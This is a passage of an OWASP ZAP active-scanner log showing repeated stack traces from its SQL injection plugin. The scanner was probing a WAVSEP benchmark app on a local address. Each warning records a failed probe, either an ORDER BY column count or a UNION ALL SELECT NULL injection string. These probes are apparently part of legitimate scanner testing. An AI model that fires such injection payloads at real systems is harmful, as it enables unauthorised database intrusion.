org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963000 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963001 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963002 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 3680#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp ORDER BY 3680# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963003 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963004 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963007 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963008 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963009 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963011 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963012 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963014 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963016 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963017 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 